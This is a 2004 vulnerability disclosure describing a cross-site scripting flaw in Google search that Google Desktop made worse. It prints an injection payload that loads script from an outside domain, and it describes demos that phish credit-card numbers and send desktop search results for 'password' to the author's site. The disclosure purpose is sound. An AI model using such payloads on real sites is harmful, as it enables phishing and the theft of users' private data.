Google Desktop Exploit

Simple Google Cross Site Scripting Exploit.
17th October 2004
Jim Ley, Jibbering.com

Google Fix

Google have now patched their boxes, and the last time I saw the exploit working was 5:51 GMT on 20th October 2004, the fix doesn't seem to be complete to me - it still special cases the strings javascript and vbscript, so it's still possible to put things other than http urls into the img (which seems to be the only logical thing to allow to me) This may mean there are remaining vectors to attack, either with different script methods, or by playing with charsets that bypass the filtering.

The Problem

For over two years Google has had an script insertion flaw, I reported it two years ago, and again a couple of months ago, but still it's not been fixed. Google Desktop has made the situation worse, as now google search results include the content of local files in the search results. With this in mind I produced a couple of simple example exploits.

Credit Card Phishing example

You can replace the content of the Google page with your own content, here I replaced it with a simple credit card submission form suggesting that google will shortly become a subscription service. Screenshot of it in use.

The desktop sniffer example

Visit Google with this link, and the inserted google desktop search for password will be reported to my site.

The exploit might be easier to do with a custom form:

Google

The exploit is simple: simply include a search term cof with the value: L:javascript:javascript:document.appendChild(document.createElement('script')).src='http://jibbering.com/test.js' and the page will load the script from my domain. The problem is that google fails to correctly check that the image you reference to cutomise the look is an actual image, and not some script, this is a well known problem for web authors, There was a CERT advisory back in 2000 along with tips on how to mitigate against it, google developers seem to have missed them though. That script can obviously do anything www.google.com has permission for - what it does is in the second case is create a hidden IFRAME containing a regular google search for password (or the search term you used if you used one) and return part of the page to a page on my site which stores the data, the first replaces it with a form requesting a credit card number to buy access to google, with all the details forwarded to my site.

Screenshot of the phishing exploit

Screenshot of Google showing inserted credit card form

Jim Ley - jim@jibbering.com, Jibbering.com